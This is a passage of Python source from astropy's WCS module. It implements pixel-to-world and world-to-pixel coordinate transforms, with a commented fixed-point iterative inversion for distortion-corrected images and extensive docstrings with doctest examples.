out[:, self.wcs.lng] = sky[:, 0]
out[:, self.wcs.lat] = sky[:, 1]
return out
def _normalize_sky(self, sky):
if self.wcs.lngtyp != 'RA':
raise ValueError(
"WCS does not have longitude type of 'RA', therefore " +
"(ra, dec) data can not be returned")
if self.wcs.lattyp != 'DEC':
raise ValueError(
"WCS does not have longitude type of 'DEC', therefore " +
"(ra, dec) data can not be returned")
if self.wcs.naxis == 2:
if self.wcs.lng == 0 and self.wcs.lat == 1:
return sky
elif self.wcs.lng == 1 and self.wcs.lat == 0:
# Reverse the order of the columns
return sky[:, ::-1]
else:
raise ValueError(
"WCS does not have longitude and latitude celestial "
"axes, therefore (ra, dec) data can not be returned")
else:
if self.wcs.lng < 0 or self.wcs.lat < 0:
raise ValueError(
"WCS does not have both longitude and latitude celestial "
"axes, therefore (ra, dec) data can not be returned")
out = np.empty((sky.shape[0], 2))
out[:, 0] = sky[:, self.wcs.lng]
out[:, 1] = sky[:, self.wcs.lat]
return out
def _array_converter(self, func, sky, *args, ra_dec_order=False):
"""
A helper function to support reading either a pair of arrays
or a single Nx2 array.
"""
def _return_list_of_arrays(axes, origin):
if any([x.size == 0 for x in axes]):
return axes
try:
axes = np.broadcast_arrays(*axes)
except ValueError:
raise ValueError(
"Coordinate arrays are not broadcastable to each other")
xy = np.hstack([x.reshape((x.size, 1)) for x in axes])
if ra_dec_order and sky == 'input':
xy = self._denormalize_sky(xy)
output = func(xy, origin)
if ra_dec_order and sky == 'output':
output = self._normalize_sky(output)
return (output[:, 0].reshape(axes[0].shape),
output[:, 1].reshape(axes[0].shape))
return [output[:, i].reshape(axes[0].shape)
for i in range(output.shape[1])]
def _return_single_array(xy, origin):
if xy.shape[-1] != self.naxis:
raise ValueError(
"When providing two arguments, the array must be "
"of shape (N, {})".format(self.naxis))
if 0 in xy.shape:
return xy
if ra_dec_order and sky == 'input':
xy = self._denormalize_sky(xy)
result = func(xy, origin)
if ra_dec_order and sky == 'output':
result = self._normalize_sky(result)
return result
if len(args) == 2:
try:
xy, origin = args
xy = np.asarray(xy)
origin = int(origin)
except Exception:
raise TypeError(
"When providing two arguments, they must be "
"(coords[N][{}], origin)".format(self.naxis))
if xy.shape == () or len(xy.shape) == 1:
return _return_list_of_arrays([xy], origin)
return _return_single_array(xy, origin)
elif len(args) == self.naxis + 1:
axes = args[:-1]
origin = args[-1]
try:
axes = [np.asarray(x) for x in axes]
origin = int(origin)
except Exception:
raise TypeError(
"When providing more than two arguments, they must be " +
"a 1-D array for each axis, followed by an origin.")
return _return_list_of_arrays(axes, origin)
raise TypeError(
"WCS projection has {0} dimensions, so expected 2 (an Nx{0} array "
"and the origin argument) or {1} arguments (the position in each "
"dimension, and the origin argument). Instead, {2} arguments were "
"given.".format(
self.naxis, self.naxis + 1, len(args)))
def all_pix2world(self, *args, **kwargs):
return self._array_converter(
self._all_pix2world, 'output', *args, **kwargs)
all_pix2world.__doc__ = """
Transforms pixel coordinates to world coordinates.
Performs all of the following in series:
- Detector to image plane correction (if present in the
FITS file)
- `SIP`_ distortion correction (if present in the FITS
file)
- `distortion paper`_ table-lookup correction (if present
in the FITS file)
- `wcslib`_ "core" WCS transformation
Parameters
----------
{}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{}
Returns
-------
{}
Notes
-----
The order of the axes for the result is determined by the
``CTYPEia`` keywords in the FITS header, therefore it may not
always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp` and `~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
Raises
------
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('sky coordinates, in degrees', 8))
def wcs_pix2world(self, *args, **kwargs):
if self.wcs is None:
raise ValueError("No basic WCS settings were created.")
return self._array_converter(
lambda xy, o: self.wcs.p2s(xy, o)['world'],
'output', *args, **kwargs)
wcs_pix2world.__doc__ = """
Transforms pixel coordinates to world coordinates by doing
only the basic `wcslib`_ transformation.
No `SIP`_ or `distortion paper`_ table lookup correction is
applied. To perform distortion correction, see
`~astropy.wcs.WCS.all_pix2world`,
`~astropy.wcs.WCS.sip_pix2foc`, `~astropy.wcs.WCS.p4_pix2foc`,
or `~astropy.wcs.WCS.pix2foc`.
Parameters
----------
{}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
Notes
-----
The order of the axes for the result is determined by the
``CTYPEia`` keywords in the FITS header, therefore it may not
always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp` and `~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('world coordinates, in degrees', 8))
def _all_world2pix(self, world, origin, tolerance, maxiter, adaptive,
detect_divergence, quiet):
# ############################################################
# # DESCRIPTION OF THE NUMERICAL METHOD ##
# ############################################################
# In this section I will outline the method of solving
# the inverse problem of converting world coordinates to
# pixel coordinates (*inverse* of the direct transformation
# `all_pix2world`) and I will summarize some of the aspects
# of the method proposed here and some of the issues of the
# original `all_world2pix` (in relation to this method)
# discussed in https://github.com/astropy/astropy/issues/1977
# A more detailed discussion can be found here:
# https://github.com/astropy/astropy/pull/2373
#
#
# ### Background ###
#
#
# I will refer here to the [SIP Paper]
# (http://fits.gsfc.nasa.gov/registry/sip/SIP_distortion_v1_0.pdf).
# According to this paper, the effect of distortions as
# described in *their* equation (1) is:
#
# (1) x = CD*(u+f(u)),
#
# where `x` is a *vector* of "intermediate spherical
# coordinates" (equivalent to (x,y) in the paper) and `u`
# is a *vector* of "pixel coordinates", and `f` is a vector
# function describing geometrical distortions
# (see equations 2 and 3 in SIP Paper.
# However, I prefer to use `w` for "intermediate world
# coordinates", `x` for pixel coordinates, and assume that
# transformation `W` performs the **linear**
# (CD matrix + projection onto celestial sphere) part of the
# conversion from pixel coordinates to world coordinates.
# Then we can re-write (1) as:
#
# (2) w = W*(x+f(x)) = T(x)
#
# In `astropy.wcs.WCS` transformation `W` is represented by
# the `wcs_pix2world` member, while the combined ("total")
# transformation (linear part + distortions) is performed by
# `all_pix2world`. Below I summarize the notations and their
# equivalents in `astropy.wcs.WCS`:
#
# | Equation term | astropy.WCS/meaning |
# | ------------- | ---------------------------- |
# | `x` | pixel coordinates |
# | `w` | world coordinates |
# | `W` | `wcs_pix2world()` |
# | `W^{-1}` | `wcs_world2pix()` |
# | `T` | `all_pix2world()` |
# | `x+f(x)` | `pix2foc()` |
#
#
# ### Direct Solving of Equation (2) ###
#
#
# In order to find the pixel coordinates that correspond to
# given world coordinates `w`, it is necessary to invert
# equation (2): `x=T^{-1}(w)`, or solve equation `w==T(x)`
# for `x`. However, this approach has the following
# disadvantages:
# 1. It requires unnecessary transformations (see next
# section).
# 2. It is prone to "RA wrapping" issues as described in
# https://github.com/astropy/astropy/issues/1977
# (essentially because `all_pix2world` may return points with
# a different phase than user's input `w`).
#
#
# ### Description of the Method Used here ###
#
#
# By applying inverse linear WCS transformation (`W^{-1}`)
# to both sides of equation (2) and introducing notation `x'`
# (prime) for the pixels coordinates obtained from the world
# coordinates by applying inverse *linear* WCS transformation
# ("focal plane coordinates"):
#
# (3) x' = W^{-1}(w)
#
# we obtain the following equation:
#
# (4) x' = x+f(x),
#
# or,
#
# (5) x = x'-f(x)
#
# This equation is well suited for solving using the method
# of fixed-point iterations
# (http://en.wikipedia.org/wiki/Fixed-point_iteration):
#
# (6) x_{i+1} = x'-f(x_i)
#
# As an initial value of the pixel coordinate `x_0` we take
# "focal plane coordinate" `x'=W^{-1}(w)=wcs_world2pix(w)`.
# We stop iterations when `|x_{i+1}-x_i|<tolerance`. We also
# consider the process to be diverging if
# `|x_{i+1}-x_i|>|x_i-x_{i-1}|`
# **when** `|x_{i+1}-x_i|>=tolerance` (when current
# approximation is close to the true solution,
# `|x_{i+1}-x_i|>|x_i-x_{i-1}|` may be due to rounding errors
# and we ignore such "divergences" when
# `|x_{i+1}-x_i|<tolerance`). It may appear that checking for
# `|x_{i+1}-x_i|<tolerance` in order to ignore divergence is
# unnecessary since the iterative process should stop anyway,
# however, the proposed implementation of this iterative
# process is completely vectorized and, therefore, we may
# continue iterating over *some* points even though they have
# converged to within a specified tolerance (while iterating
# over other points that have not yet converged to
# a solution).
#
# In order to efficiently implement iterative process (6)
# using available methods in `astropy.wcs.WCS`, we add and
# subtract `x_i` from the right side of equation (6):
#
# (7) x_{i+1} = x'-(x_i+f(x_i))+x_i = x'-pix2foc(x_i)+x_i,
#
# where `x'=wcs_world2pix(w)` and it is computed only *once*
# before the beginning of the iterative process (and we also
# set `x_0=x'`). By using `pix2foc` at each iteration instead
# of `all_pix2world` we get about 25% increase in performance
# (by not performing the linear `W` transformation at each
# step) and we also avoid the "RA wrapping" issue described
# above (by working in focal plane coordinates and avoiding
# pix->world transformations).
#
# As an added benefit, the process converges to the correct
# solution in just one iteration when distortions are not
# present (compare to
# https://github.com/astropy/astropy/issues/1977 and
# https://github.com/astropy/astropy/pull/2294): in this case
# `pix2foc` is the identical transformation
# `x_i=pix2foc(x_i)` and from equation (7) we get:
#
# x' = x_0 = wcs_world2pix(w)
# x_1 = x' - pix2foc(x_0) + x_0 = x' - pix2foc(x') + x' = x'
# = wcs_world2pix(w) = x_0
# =>
# |x_1-x_0| = 0 < tolerance (with tolerance > 0)
#
# However, for performance reasons, it is still better to
# avoid iterations altogether and return the exact linear
# solution (`wcs_world2pix`) right-away when non-linear
# distortions are not present by checking that attributes
# `sip`, `cpdis1`, `cpdis2`, `det2im1`, and `det2im2` are
# *all* `None`.
#
#
# ### Outline of the Algorithm ###
#
#
# While the proposed code is relatively long (considering
# the simplicity of the algorithm), this is due to: 1)
# checking if iterative solution is necessary at all; 2)
# checking for divergence; 3) re-implementation of the
# completely vectorized algorithm as an "adaptive" vectorized
# algorithm (for cases when some points diverge for which we
# want to stop iterations). In my tests, the adaptive version
# of the algorithm is about 50% slower than non-adaptive
# version for all HST images.
#
# The essential part of the vectorized non-adaptive algorithm
# (without divergence and other checks) can be described
# as follows:
#
# pix0 = self.wcs_world2pix(world, origin)
# pix = pix0.copy() # 0-order solution
#
# for k in range(maxiter):
# # find correction to the previous solution:
# dpix = self.pix2foc(pix, origin) - pix0
#
# # compute norm (L2) of the correction:
# dn = np.linalg.norm(dpix, axis=1)
#
# # apply correction:
# pix -= dpix
#
# # check convergence:
# if np.max(dn) < tolerance:
# break
#
# return pix
#
# Here, the input parameter `world` can be a `MxN` array
# where `M` is the number of coordinate axes in WCS and `N`
# is the number of points to be converted simultaneously to
# image coordinates.
#
#
# ### IMPORTANT NOTE: ###
#
# If, in the future releases of the `~astropy.wcs`,
# `pix2foc` will not apply all the required distortion
# corrections then in the code below, calls to `pix2foc` will
# have to be replaced with
# wcs_world2pix(all_pix2world(pix_list, origin), origin)
#
# ############################################################
# # INITIALIZE ITERATIVE PROCESS: ##
# ############################################################
# initial approximation (linear WCS based only)
pix0 = self.wcs_world2pix(world, origin)
# Check that an iterative solution is required at all
# (when any of the non-CD-matrix-based corrections are
# present). If not required return the initial
# approximation (pix0).
if not self.has_distortion:
# No non-WCS corrections detected so
# simply return initial approximation:
return pix0
pix = pix0.copy() # 0-order solution
# initial correction:
dpix = self.pix2foc(pix, origin) - pix0
# Update initial solution:
pix -= dpix
# Norm (L2) squared of the correction:
dn = np.sum(dpix*dpix, axis=1)
dnprev = dn.copy() # if adaptive else dn
tol2 = tolerance**2
# Prepare for iterative process
k = 1
ind = None
inddiv = None
# Turn off numpy runtime warnings for 'invalid' and 'over':
old_invalid = np.geterr()['invalid']
old_over = np.geterr()['over']
np.seterr(invalid='ignore', over='ignore')
# ############################################################
# # NON-ADAPTIVE ITERATIONS: ##
# ############################################################
if not adaptive:
# Fixed-point iterations:
while (np.nanmax(dn) >= tol2 and k < maxiter):
# Find correction to the previous solution:
dpix = self.pix2foc(pix, origin) - pix0
# Compute norm (L2) squared of the correction:
dn = np.sum(dpix*dpix, axis=1)
# Check for divergence (we do this in two stages
# to optimize performance for the most common
# scenario when successive approximations converge):
if detect_divergence:
divergent = (dn >= dnprev)
if np.any(divergent):
# Find solutions that have not yet converged:
slowconv = (dn >= tol2)
inddiv, = np.where(divergent & slowconv)
if inddiv.shape[0] > 0:
# Update indices of elements that
# still need correction:
conv = (dn < dnprev)
iconv = np.where(conv)
# Apply correction:
dpixgood = dpix[iconv]
pix[iconv] -= dpixgood
dpix[iconv] = dpixgood
# For the next iteration choose
# non-divergent points that have not yet
# converged to the requested accuracy:
ind, = np.where(slowconv & conv)
pix0 = pix0[ind]
dnprev[ind] = dn[ind]
k += 1
# Switch to adaptive iterations:
adaptive = True
break
# Save current correction magnitudes for later:
dnprev = dn
# Apply correction:
pix -= dpix
k += 1
# ############################################################
# # ADAPTIVE ITERATIONS: ##
# ############################################################
if adaptive:
if ind is None:
ind, = np.where(np.isfinite(pix).all(axis=1))
pix0 = pix0[ind]
# "Adaptive" fixed-point iterations:
while (ind.shape[0] > 0 and k < maxiter):
# Find correction to the previous solution:
dpixnew = self.pix2foc(pix[ind], origin) - pix0
# Compute norm (L2) of the correction:
dnnew = np.sum(np.square(dpixnew), axis=1)
# Bookeeping of corrections:
dnprev[ind] = dn[ind].copy()
dn[ind] = dnnew
if detect_divergence:
# Find indices of pixels that are converging:
conv = (dnnew < dnprev[ind])
iconv = np.where(conv)
iiconv = ind[iconv]
# Apply correction:
dpixgood = dpixnew[iconv]
pix[iiconv] -= dpixgood
dpix[iiconv] = dpixgood
# Find indices of solutions that have not yet
# converged to the requested accuracy
# AND that do not diverge:
subind, = np.where((dnnew >= tol2) & conv)
else:
# Apply correction:
pix[ind] -= dpixnew
dpix[ind] = dpixnew
# Find indices of solutions that have not yet
# converged to the requested accuracy:
subind, = np.where(dnnew >= tol2)
# Choose solutions that need more iterations:
ind = ind[subind]
pix0 = pix0[subind]
k += 1
# ############################################################
# # FINAL DETECTION OF INVALID, DIVERGING, ##
# # AND FAILED-TO-CONVERGE POINTS ##
# ############################################################
# Identify diverging and/or invalid points:
invalid = ((~np.all(np.isfinite(pix), axis=1)) &
(np.all(np.isfinite(world), axis=1)))
# When detect_divergence==False, dnprev is outdated
# (it is the norm of the very first correction).
# Still better than nothing...
inddiv, = np.where(((dn >= tol2) & (dn >= dnprev)) | invalid)
if inddiv.shape[0] == 0:
inddiv = None
# Identify points that did not converge within 'maxiter'
# iterations:
if k >= maxiter:
ind, = np.where((dn >= tol2) & (dn < dnprev) & (~invalid))
if ind.shape[0] == 0:
ind = None
else:
ind = None
# Restore previous numpy error settings:
np.seterr(invalid=old_invalid, over=old_over)
# ############################################################
# # RAISE EXCEPTION IF DIVERGING OR TOO SLOWLY CONVERGING ##
# # DATA POINTS HAVE BEEN DETECTED: ##
# ############################################################
if (ind is not None or inddiv is not None) and not quiet:
if inddiv is None:
raise NoConvergence(
"'WCS.all_world2pix' failed to "
"converge to the requested accuracy after {:d} "
"iterations.".format(k), best_solution=pix,
accuracy=np.abs(dpix), niter=k,
slow_conv=ind, divergent=None)
else:
raise NoConvergence(
"'WCS.all_world2pix' failed to "
"converge to the requested accuracy.\n"
"After {:d} iterations, the solution is diverging "
"at least for one input point."
.format(k), best_solution=pix,
accuracy=np.abs(dpix), niter=k,
slow_conv=ind, divergent=inddiv)
return pix
def all_world2pix(self, *args, tolerance=1e-4, maxiter=20, adaptive=False,
detect_divergence=True, quiet=False, **kwargs):
if self.wcs is None:
raise ValueError("No basic WCS settings were created.")
return self._array_converter(
lambda *args, **kwargs:
self._all_world2pix(
*args, tolerance=tolerance, maxiter=maxiter,
adaptive=adaptive, detect_divergence=detect_divergence,
quiet=quiet),
'input', *args, **kwargs
)
all_world2pix.__doc__ = """
all_world2pix(*arg, accuracy=1.0e-4, maxiter=20,
adaptive=False, detect_divergence=True, quiet=False)
Transforms world coordinates to pixel coordinates, using
numerical iteration to invert the full forward transformation
`~astropy.wcs.WCS.all_pix2world` with complete
distortion model.
Parameters
----------
{0}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{1}
tolerance : float, optional (Default = 1.0e-4)
Tolerance of solution. Iteration terminates when the
iterative solver estimates that the "true solution" is
within this many pixels current estimate, more
specifically, when the correction to the solution found
during the previous iteration is smaller
(in the sense of the L2 norm) than ``tolerance``.
maxiter : int, optional (Default = 20)
Maximum number of iterations allowed to reach a solution.
quiet : bool, optional (Default = False)
Do not throw :py:class:`NoConvergence` exceptions when
the method does not converge to a solution with the
required accuracy within a specified number of maximum
iterations set by ``maxiter`` parameter. Instead,
simply return the found solution.
Other Parameters
----------------
adaptive : bool, optional (Default = False)
Specifies whether to adaptively select only points that
did not converge to a solution within the required
accuracy for the next iteration. Default is recommended
for HST as well as most other instruments.
.. note::
The :py:meth:`all_world2pix` uses a vectorized
implementation of the method of consecutive
approximations (see ``Notes`` section below) in which it
iterates over *all* input points *regardless* until
the required accuracy has been reached for *all* input
points. In some cases it may be possible that
*almost all* points have reached the required accuracy
but there are only a few of input data points for
which additional iterations may be needed (this
depends mostly on the characteristics of the geometric
distortions for a given instrument). In this situation
it may be advantageous to set ``adaptive`` = `True` in
which case :py:meth:`all_world2pix` will continue
iterating *only* over the points that have not yet
converged to the required accuracy. However, for the
HST's ACS/WFC detector, which has the strongest
distortions of all HST instruments, testing has
shown that enabling this option would lead to a about
50-100% penalty in computational time (depending on
specifics of the image, geometric distortions, and
number of input points to be converted). Therefore,
for HST and possibly instruments, it is recommended
to set ``adaptive`` = `False`. The only danger in
getting this setting wrong will be a performance
penalty.
.. note::
When ``detect_divergence`` is `True`,
:py:meth:`all_world2pix` will automatically switch
to the adaptive algorithm once divergence has been
detected.
detect_divergence : bool, optional (Default = True)
Specifies whether to perform a more detailed analysis
of the convergence to a solution. Normally
:py:meth:`all_world2pix` may not achieve the required
accuracy if either the ``tolerance`` or ``maxiter`` arguments
are too low. However, it may happen that for some
geometric distortions the conditions of convergence for
the the method of consecutive approximations used by
:py:meth:`all_world2pix` may not be satisfied, in which
case consecutive approximations to the solution will
diverge regardless of the ``tolerance`` or ``maxiter``
settings.
When ``detect_divergence`` is `False`, these divergent
points will be detected as not having achieved the
required accuracy (without further details). In addition,
if ``adaptive`` is `False` then the algorithm will not
know that the solution (for specific points) is diverging
and will continue iterating and trying to "improve"
diverging solutions. This may result in ``NaN`` or
``Inf`` values in the return results (in addition to a
performance penalties). Even when ``detect_divergence``
is `False`, :py:meth:`all_world2pix`, at the end of the
iterative process, will identify invalid results
(``NaN`` or ``Inf``) as "diverging" solutions and will
raise :py:class:`NoConvergence` unless the ``quiet``
parameter is set to `True`.
When ``detect_divergence`` is `True`,
:py:meth:`all_world2pix` will detect points for which
current correction to the coordinates is larger than
the correction applied during the previous iteration
**if** the requested accuracy **has not yet been
achieved**. In this case, if ``adaptive`` is `True`,
these points will be excluded from further iterations and
if ``adaptive`` is `False`, :py:meth:`all_world2pix` will
automatically switch to the adaptive algorithm. Thus, the
reported divergent solution will be the latest converging
solution computed immediately *before* divergence
has been detected.
.. note::
When accuracy has been achieved, small increases in
current corrections may be possible due to rounding
errors (when ``adaptive`` is `False`) and such
increases will be ignored.
.. note::
Based on our testing using HST ACS/WFC images, setting
``detect_divergence`` to `True` will incur about 5-20%
performance penalty with the larger penalty
corresponding to ``adaptive`` set to `True`.
Because the benefits of enabling this
feature outweigh the small performance penalty,
especially when ``adaptive`` = `False`, it is
recommended to set ``detect_divergence`` to `True`,
unless extensive testing of the distortion models for
images from specific instruments show a good stability
of the numerical method for a wide range of
coordinates (even outside the image itself).
.. note::
Indices of the diverging inverse solutions will be
reported in the ``divergent`` attribute of the
raised :py:class:`NoConvergence` exception object.
Returns
-------
{2}
Notes
-----
The order of the axes for the input world array is determined by
the ``CTYPEia`` keywords in the FITS header, therefore it may
not always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp`, and
`~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
Using the method of fixed-point iterations approximations we
iterate starting with the initial approximation, which is
computed using the non-distortion-aware
:py:meth:`wcs_world2pix` (or equivalent).
The :py:meth:`all_world2pix` function uses a vectorized
implementation of the method of consecutive approximations and
therefore it is highly efficient (>30x) when *all* data points
that need to be converted from sky coordinates to image
coordinates are passed at *once*. Therefore, it is advisable,
whenever possible, to pass as input a long array of all points
that need to be converted to :py:meth:`all_world2pix` instead
of calling :py:meth:`all_world2pix` for each data point. Also
see the note to the ``adaptive`` parameter.
Raises
------
NoConvergence
The method did not converge to a
solution to the required accuracy within a specified
number of maximum iterations set by the ``maxiter``
parameter. To turn off this exception, set ``quiet`` to
`True`. Indices of the points for which the requested
accuracy was not achieved (if any) will be listed in the
``slow_conv`` attribute of the
raised :py:class:`NoConvergence` exception object.
See :py:class:`NoConvergence` documentation for
more details.
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
Examples
--------
>>> import astropy.io.fits as fits
>>> import astropy.wcs as wcs
>>> import numpy as np
>>> import os
>>> filename = os.path.join(wcs.__path__[0], 'tests/data/j94f05bgq_flt.fits')
>>> hdulist = fits.open(filename)
>>> w = wcs.WCS(hdulist[('sci',1)].header, hdulist)
>>> hdulist.close()
>>> ra, dec = w.all_pix2world([1,2,3], [1,1,1], 1)
>>> print(ra) # doctest: +FLOAT_CMP
[ 5.52645627 5.52649663 5.52653698]
>>> print(dec) # doctest: +FLOAT_CMP
[-72.05171757 -72.05171276 -72.05170795]
>>> radec = w.all_pix2world([[1,1], [2,1], [3,1]], 1)
>>> print(radec) # doctest: +FLOAT_CMP
[[ 5.52645627 -72.05171757]
[ 5.52649663 -72.05171276]
[ 5.52653698 -72.05170795]]
>>> x, y = w.all_world2pix(ra, dec, 1)
>>> print(x) # doctest: +FLOAT_CMP
[ 1.00000238 2.00000237 3.00000236]
>>> print(y) # doctest: +FLOAT_CMP
[ 0.99999996 0.99999997 0.99999997]
>>> xy = w.all_world2pix(radec, 1)
>>> print(xy) # doctest: +FLOAT_CMP
[[ 1.00000238 0.99999996]
[ 2.00000237 0.99999997]
[ 3.00000236 0.99999997]]
>>> xy = w.all_world2pix(radec, 1, maxiter=3,
... tolerance=1.0e-10, quiet=False)
Traceback (most recent call last):
...
NoConvergence: 'WCS.all_world2pix' failed to converge to the
requested accuracy. After 3 iterations, the solution is
diverging at least for one input point.
>>> # Now try to use some diverging data:
>>> divradec = w.all_pix2world([[1.0, 1.0],
... [10000.0, 50000.0],
... [3.0, 1.0]], 1)
>>> print(divradec) # doctest: +FLOAT_CMP
[[ 5.52645627 -72.05171757]
[ 7.15976932 -70.8140779 ]
[ 5.52653698 -72.05170795]]
>>> # First, turn detect_divergence on:
>>> try: # doctest: +FLOAT_CMP
... xy = w.all_world2pix(divradec, 1, maxiter=20,
... tolerance=1.0e-4, adaptive=False,
... detect_divergence=True,
... quiet=False)
... except wcs.wcs.NoConvergence as e:
... print("Indices of diverging points: {{0}}"
... .format(e.divergent))
... print("Indices of poorly converging points: {{0}}"
... .format(e.slow_conv))
... print("Best solution:\\n{{0}}".format(e.best_solution))
... print("Achieved accuracy:\\n{{0}}".format(e.accuracy))
Indices of diverging points: [1]
Indices of poorly converging points: None
Best solution:
[[ 1.00000238e+00 9.99999965e-01]
[ -1.99441636e+06 1.44309097e+06]
[ 3.00000236e+00 9.99999966e-01]]
Achieved accuracy:
[[ 6.13968380e-05 8.59638593e-07]
[ 8.59526812e+11 6.61713548e+11]
[ 6.09398446e-05 8.38759724e-07]]
>>> raise e
Traceback (most recent call last):
...
NoConvergence: 'WCS.all_world2pix' failed to converge to the
requested accuracy. After 5 iterations, the solution is
diverging at least for one input point.
>>> # This time turn detect_divergence off:
>>> try: # doctest: +FLOAT_CMP
... xy = w.all_world2pix(divradec, 1, maxiter=20,
... tolerance=1.0e-4, adaptive=False,
... detect_divergence=False,
... quiet=False)
... except wcs.wcs.NoConvergence as e:
... print("Indices of diverging points: {{0}}"
... .format(e.divergent))
... print("Indices of poorly converging points: {{0}}"
... .format(e.slow_conv))
... print("Best solution:\\n{{0}}".format(e.best_solution))
... print("Achieved accuracy:\\n{{0}}".format(e.accuracy))
Indices of diverging points: [1]
Indices of poorly converging points: None
Best solution:
[[ 1.00000009 1. ]
[ nan nan]
[ 3.00000009 1. ]]
Achieved accuracy:
[[ 2.29417358e-06 3.21222995e-08]
[ nan nan]
[ 2.27407877e-06 3.13005639e-08]]
>>> raise e
Traceback (most recent call last):
...
NoConvergence: 'WCS.all_world2pix' failed to converge to the
requested accuracy. After 6 iterations, the solution is
diverging at least for one input point.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('pixel coordinates', 8))
def wcs_world2pix(self, *args, **kwargs):
if self.wcs is None:
raise ValueError("No basic WCS settings were created.")
return self._array_converter(
lambda xy, o: self.wcs.s2p(xy, o)['pixcrd'],
'input', *args, **kwargs)
wcs_world2pix.__doc__ = """
Transforms world coordinates to pixel coordinates, using only
the basic `wcslib`_ WCS transformation. No `SIP`_ or
`distortion paper`_ table lookup transformation is applied.
Parameters
----------
{}
For a transformation that is not two-dimensional, the
two-argument form must be used.
{}
Returns
-------
{}
Notes
-----
The order of the axes for the input world array is determined by
the ``CTYPEia`` keywords in the FITS header, therefore it may
not always be of the form (*ra*, *dec*). The
`~astropy.wcs.Wcsprm.lat`, `~astropy.wcs.Wcsprm.lng`,
`~astropy.wcs.Wcsprm.lattyp` and `~astropy.wcs.Wcsprm.lngtyp`
members can be used to determine the order of the axes.
Raises
------
MemoryError
Memory allocation failed.
SingularMatrixError
Linear transformation matrix is singular.
InconsistentAxisTypesError
Inconsistent or unrecognized coordinate axis types.
ValueError
Invalid parameter value.
ValueError
Invalid coordinate transformation parameters.
ValueError
x- and y-coordinate arrays are not the same size.
InvalidTransformError
Invalid coordinate transformation parameters.
InvalidTransformError
Ill-conditioned coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('naxis', 8),
docstrings.RA_DEC_ORDER(8),
docstrings.RETURNS('pixel coordinates', 8))
def pix2foc(self, *args):
return self._array_converter(self._pix2foc, None, *args)
pix2foc.__doc__ = """
Convert pixel coordinates to focal plane coordinates using the
`SIP`_ polynomial distortion convention and `distortion
paper`_ table-lookup correction.
The output is in absolute pixel coordinates, not relative to
``CRPIX``.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('focal coordinates', 8))
def p4_pix2foc(self, *args):
return self._array_converter(self._p4_pix2foc, None, *args)
p4_pix2foc.__doc__ = """
Convert pixel coordinates to focal plane coordinates using
`distortion paper`_ table-lookup correction.
The output is in absolute pixel coordinates, not relative to
``CRPIX``.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('focal coordinates', 8))
def det2im(self, *args):
return self._array_converter(self._det2im, None, *args)
det2im.__doc__ = """
Convert detector coordinates to image plane coordinates using
`distortion paper`_ table-lookup correction.
The output is in absolute pixel coordinates, not relative to
``CRPIX``.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('pixel coordinates', 8))
def sip_pix2foc(self, *args):
if self.sip is None:
if len(args) == 2:
return args[0]
elif len(args) == 3:
return args[:2]
else:
raise TypeError("Wrong number of arguments")
return self._array_converter(self.sip.pix2foc, None, *args)
sip_pix2foc.__doc__ = """
Convert pixel coordinates to focal plane coordinates using the
`SIP`_ polynomial distortion convention.
The output is in pixel coordinates, relative to ``CRPIX``.
FITS WCS `distortion paper`_ table lookup correction is not
applied, even if that information existed in the FITS file
that initialized this :class:`~astropy.wcs.WCS` object. To
correct for that, use `~astropy.wcs.WCS.pix2foc` or
`~astropy.wcs.WCS.p4_pix2foc`.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('focal coordinates', 8))
